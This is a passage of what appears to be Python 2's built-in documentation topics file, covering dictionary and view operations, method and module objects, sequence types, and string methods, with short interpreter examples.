the corresponding value in the new dictionary.\n\n If keyword arguments are given, the keyword arguments and their\n values are added to the dictionary created from the positional\n argument. If a key being added is already present, the value from\n the keyword argument replaces the value from the positional\n argument.\n\n To illustrate, the following examples all return a dictionary equal\n to "{"one": 1, "two": 2, "three": 3}":\n\n >>> a = dict(one=1, two=2, three=3)\n >>> b = {\'one\': 1, \'two\': 2, \'three\': 3}\n >>> c = dict(zip([\'one\', \'two\', \'three\'], [1, 2, 3]))\n >>> d = dict([(\'two\', 2), (\'one\', 1), (\'three\', 3)])\n >>> e = dict({\'three\': 3, \'one\': 1, \'two\': 2})\n >>> a == b == c == d == e\n True\n\n Providing keyword arguments as in the first example only works for\n keys that are valid Python identifiers. 
Otherwise, any valid keys\n can be used.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for building a dictionary from\n keyword arguments added.\n\n These are the operations that dictionaries support (and therefore,\n custom mapping types should support too):\n\n len(d)\n\n Return the number of items in the dictionary *d*.\n\n d[key]\n\n Return the item of *d* with key *key*. Raises a "KeyError" if\n *key* is not in the map.\n\n If a subclass of dict defines a method "__missing__()" and *key*\n is not present, the "d[key]" operation calls that method with\n the key *key* as argument. The "d[key]" operation then returns\n or raises whatever is returned or raised by the\n "__missing__(key)" call. No other operations or methods invoke\n "__missing__()". If "__missing__()" is not defined, "KeyError"\n is raised. "__missing__()" must be a method; it cannot be an\n instance variable:\n\n >>> class Counter(dict):\n ... def __missing__(self, key):\n ... return 0\n >>> c = Counter()\n >>> c[\'red\']\n 0\n >>> c[\'red\'] += 1\n >>> c[\'red\']\n 1\n\n The example above shows part of the implementation of\n "collections.Counter". A different "__missing__" method is used\n by "collections.defaultdict".\n\n New in version 2.5: Recognition of __missing__ methods of dict\n subclasses.\n\n d[key] = value\n\n Set "d[key]" to *value*.\n\n del d[key]\n\n Remove "d[key]" from *d*. Raises a "KeyError" if *key* is not\n in the map.\n\n key in d\n\n Return "True" if *d* has a key *key*, else "False".\n\n New in version 2.2.\n\n key not in d\n\n Equivalent to "not key in d".\n\n New in version 2.2.\n\n iter(d)\n\n Return an iterator over the keys of the dictionary. This is a\n shortcut for "iterkeys()".\n\n clear()\n\n Remove all items from the dictionary.\n\n copy()\n\n Return a shallow copy of the dictionary.\n\n fromkeys(seq[, value])\n\n Create a new dictionary with keys from *seq* and values set to\n *value*.\n\n "fromkeys()" is a class method that returns a new dictionary.\n *value* defaults to "None".\n\n New in version 2.3.\n\n get(key[, default])\n\n Return the value for *key* if *key* is in the dictionary, else\n *default*. If *default* is not given, it defaults to "None", so\n that this method never raises a "KeyError".\n\n has_key(key)\n\n Test for the presence of *key* in the dictionary. "has_key()"\n is deprecated in favor of "key in d".\n\n items()\n\n Return a copy of the dictionary\'s list of "(key, value)" pairs.\n\n **CPython implementation detail:** Keys and values are listed in\n an arbitrary order which is non-random, varies across Python\n implementations, and depends on the dictionary\'s history of\n insertions and deletions.\n\n If "items()", "keys()", "values()", "iteritems()", "iterkeys()",\n and "itervalues()" are called with no intervening modifications\n to the dictionary, the lists will directly correspond. This\n allows the creation of "(value, key)" pairs using "zip()":\n "pairs = zip(d.values(), d.keys())". The same relationship\n holds for the "iterkeys()" and "itervalues()" methods: "pairs =\n zip(d.itervalues(), d.iterkeys())" provides the same value for\n "pairs". 
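For example (a sketch; "sorted()" is applied only because the\n list order is arbitrary):\n\n >>> d = {\'one\': 1, \'two\': 2}\n >>> sorted(zip(d.values(), d.keys()))\n [(1, \'one\'), (2, \'two\')]\n\n 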
Another way to create the same list is "pairs = [(v, k)\n for (k, v) in d.iteritems()]".\n\n iteritems()\n\n Return an iterator over the dictionary\'s "(key, value)" pairs.\n See the note for "dict.items()".\n\n Using "iteritems()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n iterkeys()\n\n Return an iterator over the dictionary\'s keys. See the note for\n "dict.items()".\n\n Using "iterkeys()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n itervalues()\n\n Return an iterator over the dictionary\'s values. See the note\n for "dict.items()".\n\n Using "itervalues()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n keys()\n\n Return a copy of the dictionary\'s list of keys. See the note\n for "dict.items()".\n\n pop(key[, default])\n\n If *key* is in the dictionary, remove it and return its value,\n else return *default*. If *default* is not given and *key* is\n not in the dictionary, a "KeyError" is raised.\n\n New in version 2.3.\n\n popitem()\n\n Remove and return an arbitrary "(key, value)" pair from the\n dictionary.\n\n "popitem()" is useful to destructively iterate over a\n dictionary, as often used in set algorithms. If the dictionary\n is empty, calling "popitem()" raises a "KeyError".\n\n setdefault(key[, default])\n\n If *key* is in the dictionary, return its value. If not, insert\n *key* with a value of *default* and return *default*. *default*\n defaults to "None".\n\n update([other])\n\n Update the dictionary with the key/value pairs from *other*,\n overwriting existing keys. Return "None".\n\n "update()" accepts either another dictionary object or an\n iterable of key/value pairs (as tuples or other iterables of\n length two). If keyword arguments are specified, the dictionary\n is then updated with those key/value pairs: "d.update(red=1,\n blue=2)".\n\n Changed in version 2.4: Allowed the argument to be an iterable\n of key/value pairs and allowed keyword arguments.\n\n values()\n\n Return a copy of the dictionary\'s list of values. See the note\n for "dict.items()".\n\n viewitems()\n\n Return a new view of the dictionary\'s items ("(key, value)"\n pairs). See below for documentation of view objects.\n\n New in version 2.7.\n\n viewkeys()\n\n Return a new view of the dictionary\'s keys. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n viewvalues()\n\n Return a new view of the dictionary\'s values. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n Dictionaries compare equal if and only if they have the same "(key,\n value)" pairs.\n\n\nDictionary view objects\n=======================\n\nThe objects returned by "dict.viewkeys()", "dict.viewvalues()" and\n"dict.viewitems()" are *view objects*. 
They provide a dynamic view on\nthe dictionary\'s entries, which means that when the dictionary\nchanges, the view reflects these changes.\n\nDictionary views can be iterated over to yield their respective data,\nand support membership tests:\n\nlen(dictview)\n\n Return the number of entries in the dictionary.\n\niter(dictview)\n\n Return an iterator over the keys, values or items (represented as\n tuples of "(key, value)") in the dictionary.\n\n Keys and values are iterated over in an arbitrary order which is\n non-random, varies across Python implementations, and depends on\n the dictionary\'s history of insertions and deletions. If keys,\n values and items views are iterated over with no intervening\n modifications to the dictionary, the order of items will directly\n correspond. This allows the creation of "(value, key)" pairs using\n "zip()": "pairs = zip(d.values(), d.keys())". Another way to\n create the same list is "pairs = [(v, k) for (k, v) in d.items()]".\n\n Iterating views while adding or deleting entries in the dictionary\n may raise a "RuntimeError" or fail to iterate over all entries.\n\nx in dictview\n\n Return "True" if *x* is in the underlying dictionary\'s keys, values\n or items (in the latter case, *x* should be a "(key, value)"\n tuple).\n\nKeys views are set-like since their entries are unique and hashable.\nIf all values are hashable, so that (key, value) pairs are unique and\nhashable, then the items view is also set-like. (Values views are not\ntreated as set-like since the entries are generally not unique.) Then\nthese set operations are available ("other" refers either to another\nview or a set):\n\ndictview & other\n\n Return the intersection of the dictview and the other object as a\n new set.\n\ndictview | other\n\n Return the union of the dictview and the other object as a new set.\n\ndictview - other\n\n Return the difference between the dictview and the other object\n (all elements in *dictview* that aren\'t in *other*) as a new set.\n\ndictview ^ other\n\n Return the symmetric difference (all elements either in *dictview*\n or *other*, but not in both) of the dictview and the other object\n as a new set.\n\nAn example of dictionary view usage:\n\n >>> dishes = {\'eggs\': 2, \'sausage\': 1, \'bacon\': 1, \'spam\': 500}\n >>> keys = dishes.viewkeys()\n >>> values = dishes.viewvalues()\n\n >>> # iteration\n >>> n = 0\n >>> for val in values:\n ... n += val\n >>> print(n)\n 504\n\n >>> # keys and values are iterated over in the same order\n >>> list(keys)\n [\'eggs\', \'bacon\', \'sausage\', \'spam\']\n >>> list(values)\n [2, 1, 1, 500]\n\n >>> # view objects are dynamic and reflect dict changes\n >>> del dishes[\'eggs\']\n >>> del dishes[\'sausage\']\n >>> list(keys)\n [\'spam\', \'bacon\']\n\n >>> # set operations\n >>> keys & {\'eggs\', \'bacon\', \'salad\'}\n {\'bacon\'}\n', 'typesmethods': u'\nMethods\n*******\n\nMethods are functions that are called using the attribute notation.\nThere are two flavors: built-in methods (such as "append()" on lists)\nand class instance methods. 
Built-in methods are described with the\ntypes that support them.\n\nThe implementation adds two special read-only attributes to class\ninstance methods: "m.im_self" is the object on which the method\noperates, and "m.im_func" is the function implementing the method.\nCalling "m(arg-1, arg-2, ..., arg-n)" is completely equivalent to\ncalling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n\nClass instance methods are either *bound* or *unbound*, referring to\nwhether the method was accessed through an instance or a class,\nrespectively. When a method is unbound, its "im_self" attribute will\nbe "None" and if called, an explicit "self" object must be passed as\nthe first argument. In this case, "self" must be an instance of the\nunbound method\'s class (or a subclass of that class), otherwise a\n"TypeError" is raised.\n\nLike function objects, methods objects support getting arbitrary\nattributes. However, since method attributes are actually stored on\nthe underlying function object ("meth.im_func"), setting method\nattributes on either bound or unbound methods is disallowed.\nAttempting to set an attribute on a method results in an\n"AttributeError" being raised. In order to set a method attribute,\nyou need to explicitly set it on the underlying function object:\n\n >>> class C:\n ... def method(self):\n ... pass\n ...\n >>> c = C()\n >>> c.method.whoami = \'my name is method\' # can\'t set on the method\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n AttributeError: \'instancemethod\' object has no attribute \'whoami\'\n >>> c.method.im_func.whoami = \'my name is method\'\n >>> c.method.whoami\n \'my name is method\'\n\nSee The standard type hierarchy for more information.\n', 'typesmodules': u'\nModules\n*******\n\nThe only special operation on a module is attribute access: "m.name",\nwhere *m* is a module and *name* accesses a name defined in *m*\'s\nsymbol table. Module attributes can be assigned to. (Note that the\n"import" statement is not, strictly speaking, an operation on a module\nobject; "import foo" does not require a module object named *foo* to\nexist, rather it requires an (external) *definition* for a module\nnamed *foo* somewhere.)\n\nA special attribute of every module is "__dict__". This is the\ndictionary containing the module\'s symbol table. Modifying this\ndictionary will actually change the module\'s symbol table, but direct\nassignment to the "__dict__" attribute is not possible (you can write\n"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but you can\'t\nwrite "m.__dict__ = {}"). Modifying "__dict__" directly is not\nrecommended.\n\nModules built into the interpreter are written like this: "<module\n\'sys\' (built-in)>". If loaded from a file, they are written as\n"<module \'os\' from \'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': u'\nSequence Types --- "str", "unicode", "list", "tuple", "bytearray", "buffer", "xrange"\n*************************************************************************************\n\nThere are seven sequence types: strings, Unicode strings, lists,\ntuples, bytearrays, buffers, and xrange objects.\n\nFor other containers see the built in "dict" and "set" classes, and\nthe "collections" module.\n\nString literals are written in single or double quotes: "\'xyzzy\'",\n""frobozz"". See String literals for more about string literals.\nUnicode strings are much like strings, but are specified in the syntax\nusing a preceding "\'u\'" character: "u\'abc\'", "u"def"". 
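All seven types can be constructed interactively (a minimal\nsketch):\n\n >>> \'abc\', u\'abc\' # str, unicode\n (\'abc\', u\'abc\')\n >>> [1, 2], (1, 2), bytearray(\'ab\'), xrange(3)\n ([1, 2], (1, 2), bytearray(b\'ab\'), xrange(3))\n >>> str(buffer(\'abc\'))\n \'abc\'\n\n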
In addition to\nthe functionality described here, there are also string-specific\nmethods described in the String Methods section. Lists are constructed\nwith square brackets, separating items with commas: "[a, b, c]".\nTuples are constructed by the comma operator (not within square\nbrackets), with or without enclosing parentheses, but an empty tuple\nmust have the enclosing parentheses, such as "a, b, c" or "()". A\nsingle item tuple must have a trailing comma, such as "(d,)".\n\nBytearray objects are created with the built-in function\n"bytearray()".\n\nBuffer objects are not directly supported by Python syntax, but can be\ncreated by calling the built-in function "buffer()". They don\'t\nsupport concatenation or repetition.\n\nObjects of type xrange are similar to buffers in that there is no\nspecific syntax to create them, but they are created using the\n"xrange()" function. They don\'t support slicing, concatenation or\nrepetition, and using "in", "not in", "min()" or "max()" on them is\ninefficient.\n\nMost sequence types support the following operations. The "in" and\n"not in" operations have the same priorities as the comparison\noperations. The "+" and "*" operations have the same priority as the\ncorresponding numeric operations. [3] Additional methods are provided\nfor Mutable Sequence Types.\n\nThis table lists the sequence operations sorted in ascending priority.\nIn the table, *s* and *t* are sequences of the same type; *n*, *i* and\n*j* are integers:\n\n+--------------------+----------------------------------+------------+\n| Operation | Result | Notes |\n+====================+==================================+============+\n| "x in s" | "True" if an item of *s* is | (1) |\n| | equal to *x*, else "False" | |\n+--------------------+----------------------------------+------------+\n| "x not in s" | "False" if an item of *s* is | (1) |\n| | equal to *x*, else "True" | |\n+--------------------+----------------------------------+------------+\n| "s + t" | the concatenation of *s* and *t* | (6) |\n+--------------------+----------------------------------+------------+\n| "s * n, n * s" | equivalent to adding *s* to | (2) |\n| | itself *n* times | |\n+--------------------+----------------------------------+------------+\n| "s[i]" | *i*th item of *s*, origin 0 | (3) |\n+--------------------+----------------------------------+------------+\n| "s[i:j]" | slice of *s* from *i* to *j* | (3)(4) |\n+--------------------+----------------------------------+------------+\n| "s[i:j:k]" | slice of *s* from *i* to *j* | (3)(5) |\n| | with step *k* | |\n+--------------------+----------------------------------+------------+\n| "len(s)" | length of *s* | |\n+--------------------+----------------------------------+------------+\n| "min(s)" | smallest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "max(s)" | largest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "s.index(x)" | index of the first occurrence of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n| "s.count(x)" | total number of occurrences of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n\nSequence types also support comparisons. In particular, tuples and\nlists are compared lexicographically by comparing corresponding\nelements. 
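For instance (sketch):\n\n >>> (1, 2, 3) < (1, 2, 4)\n True\n >>> [1, 2] == (1, 2) # same items, but different types\n False\n\n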
This means that to compare equal, every element must compare\nequal and the two sequences must be of the same type and have the same\nlength. (For full details see Comparisons in the language reference.)\n\nNotes:\n\n1. When *s* is a string or Unicode string object the "in" and "not\n in" operations act like a substring test. In Python versions\n before 2.3, *x* had to be a string of length 1. In Python 2.3 and\n beyond, *x* may be a string of any length.\n\n2. Values of *n* less than "0" are treated as "0" (which yields an\n empty sequence of the same type as *s*). Note that items in the\n sequence *s* are not copied; they are referenced multiple times.\n This often haunts new Python programmers; consider:\n\n >>> lists = [[]] * 3\n >>> lists\n [[], [], []]\n >>> lists[0].append(3)\n >>> lists\n [[3], [3], [3]]\n\n What has happened is that "[[]]" is a one-element list containing\n an empty list, so all three elements of "[[]] * 3" are references\n to this single empty list. Modifying any of the elements of\n "lists" modifies this single list. You can create a list of\n different lists this way:\n\n >>> lists = [[] for i in range(3)]\n >>> lists[0].append(3)\n >>> lists[1].append(5)\n >>> lists[2].append(7)\n >>> lists\n [[3], [5], [7]]\n\n Further explanation is available in the FAQ entry How do I create a\n multidimensional list?.\n\n3. If *i* or *j* is negative, the index is relative to the end of\n the string: "len(s) + i" or "len(s) + j" is substituted. But note\n that "-0" is still "0".\n\n4. The slice of *s* from *i* to *j* is defined as the sequence of\n items with index *k* such that "i <= k < j". If *i* or *j* is\n greater than "len(s)", use "len(s)". If *i* is omitted or "None",\n use "0". If *j* is omitted or "None", use "len(s)". If *i* is\n greater than or equal to *j*, the slice is empty.\n\n5. The slice of *s* from *i* to *j* with step *k* is defined as the\n sequence of items with index "x = i + n*k" such that "0 <= n <\n (j-i)/k". In other words, the indices are "i", "i+k", "i+2*k",\n "i+3*k" and so on, stopping when *j* is reached (but never\n including *j*). If *i* or *j* is greater than "len(s)", use\n "len(s)". If *i* or *j* are omitted or "None", they become "end"\n values (which end depends on the sign of *k*). Note, *k* cannot be\n zero. If *k* is "None", it is treated like "1".\n\n6. **CPython implementation detail:** If *s* and *t* are both\n strings, some Python implementations such as CPython can usually\n perform an in-place optimization for assignments of the form "s = s\n + t" or "s += t". When applicable, this optimization makes\n quadratic run-time much less likely. This optimization is both\n version and implementation dependent. For performance sensitive\n code, it is preferable to use the "str.join()" method which assures\n consistent linear concatenation performance across versions and\n implementations.\n\n Changed in version 2.4: Formerly, string concatenation never\n occurred in-place.\n\n\nString Methods\n==============\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. 
Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. 
Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01      012     0123    01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01  012 0123    01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). 
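For example (sketch):\n\n >>> \'py\'.ljust(6, \'.\')\n \'py....\'\n\n 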
The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \" spacious \".lstrip()\n \"spacious \"\n >>> \"www.example.com\".lstrip(\"cmowz.\")\n \"example.com\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \" spacious \".rstrip()\n \" spacious\"\n >>> \"mississippi\".rstrip(\"ipz\")\n \"mississ\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. 
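For example (sketch):\n\n >>> \'1,2,3\'.split(\',\')\n [\'1\', \'2\', \'3\']\n\n 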
If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\"1,,2\".split(\",\")" returns "[\"1\", \"\", \"2\"]"). The *sep* argument\n may consist of multiple characters (for example,\n "\"1<>2<>3\".split(\"<>\")" returns "[\"1\", \"2\", \"3\"]"). Splitting an\n empty string with a specified separator returns "[\"\"]".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\" 1 2 3 \".split()" returns "[\"1\", \"2\", \"3\"]", and\n "\" 1 2 3 \".split(None, 1)" returns "[\"1\", \"2 3 \"]".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\"ab c\\n\\nde fg\\rkl\\r\\n\".splitlines()" returns "[\"ab\n c\", \"\", \"de fg\", \"kl\"]", while the same call with\n "splitlines(True)" returns "[\"ab c\\n\", \"\\n\", \"de fg\\r\", \"kl\\r\\n\"]".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \" spacious \".strip()\n \"spacious\"\n >>> \"www.example.com\".strip(\"cmowz.\")\n \"example\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. 
The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \"read this short text\".translate(None, \"aeiou\")\n \"rd ths shrt txt\"\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n\n\nString Formatting Operations\n============================\n\nString and Unicode objects have one unique built-in operation: the "%"\noperator (modulo). This is also known as the string *formatting* or\n*interpolation* operator. Given "format % values" (where *format* is\na string or Unicode object), "%" conversion specifications in *format*\nare replaced with zero or more elements of *values*. The effect is\nsimilar to using "sprintf()" in the C language. 
